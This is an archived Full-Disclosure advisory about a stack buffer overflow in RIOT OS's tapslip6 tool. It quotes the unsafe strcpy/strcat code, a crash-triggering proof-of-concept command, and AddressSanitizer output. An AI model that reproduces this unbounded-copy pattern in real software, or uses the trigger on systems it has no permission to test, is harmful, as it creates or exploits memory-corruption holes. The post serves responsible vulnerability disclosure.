lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <CAFmK-GxBXmHZqfPMxWnJt_ku-fjyFqbKG9xF0_6iOr6p8KSLbQ@mail.gmail.com>
Date: Thu, 8 Jan 2026 10:42:45 -0500
From: Ron E <ronaldjedgerson@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] RIOT OS 2026.01-devel-317 Stack-Based Buffer Overflow in
 tapslip6 Utility via Unbounded Device Path Construction

A stack-based buffer overflow vulnerability exists in the tapslip6 utility
distributed with RIOT OS (and derived from the legacy uIP/Contiki
networking tools). The vulnerability is caused by unsafe string
concatenation in the devopen() function, which constructs a device path
using unbounded user-controlled input.
Specifically, tapslip6 uses strcpy() and strcat() to concatenate the fixed
prefix "/dev/" with a user-supplied device name provided via the -s
command-line option. No bounds checking is performed, allowing an attacker
to supply an excessively long device name and overflow a fixed-size stack
buffer. This issue can lead to process crashes and memory corruption. While
exploitation requires local access, the affected utility is commonly
executed with elevated privileges during development, testing, or
deployment of RIOT OS networking environments, increasing impact.



*Root Cause:*int devopen(const char *dev, int flags)
{
    char t[1024];
    strcpy(t, "/dev/");
    strcat(t, dev);
    return open(t, flags);
}

*Impact:*

   - Stack-based buffer overflow
   - Process termination (Denial of Service)
   - Memory corruption




*Proof of Concept:*./tapslip6 -s $(python3 - << 'EOF'
print("A"*3000)
EOF
) 10.0.0.1 255.255.255.0



*Output:*=================================================================
==492967==ERROR: AddressSanitizer: stack-buffer-overflow on address
0xfbffa6001140 at pc 0xaaaab3e609a4 bp 0xffffd6e212c0 sp 0xffffd6e20ab0
WRITE of size 3001 at 0xfbffa6001140 thread T0
    #0 0xaaaab3e609a0 in strcat
(/root/RIOT/dist/tools/tunslip/tapslip6+0xc09a0) (BuildId:
cf8e25195b4cb64b5a381ae2324d1971ccc6d6ab)
    #1 0xaaaab3ec04f0 in devopen
/root/RIOT/dist/tools/tunslip/tapslip6.c:420:5
    #2 0xaaaab3ec04f0 in main
/root/RIOT/dist/tools/tunslip/tapslip6.c:629:18
    #3 0xffffa7a42598 in __libc_start_call_main
csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #4 0xffffa7a42678 in __libc_start_main csu/../csu/libc-start.c:360:3
    #5 0xaaaab3dd73ec in _start
(/root/RIOT/dist/tools/tunslip/tapslip6+0x373ec) (BuildId:
cf8e25195b4cb64b5a381ae2324d1971ccc6d6ab)

Address 0xfbffa6001140 is located in stack of thread T0 at offset 4416 in
frame
    #0 0xaaaab3ebfef8 in main /root/RIOT/dist/tools/tunslip/tapslip6.c:543

SUMMARY: AddressSanitizer: stack-buffer-overflow
(/root/RIOT/dist/tools/tunslip/tapslip6+0xc09a0) (BuildId:
cf8e25195b4cb64b5a381ae2324d1971ccc6d6ab) in strcat
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ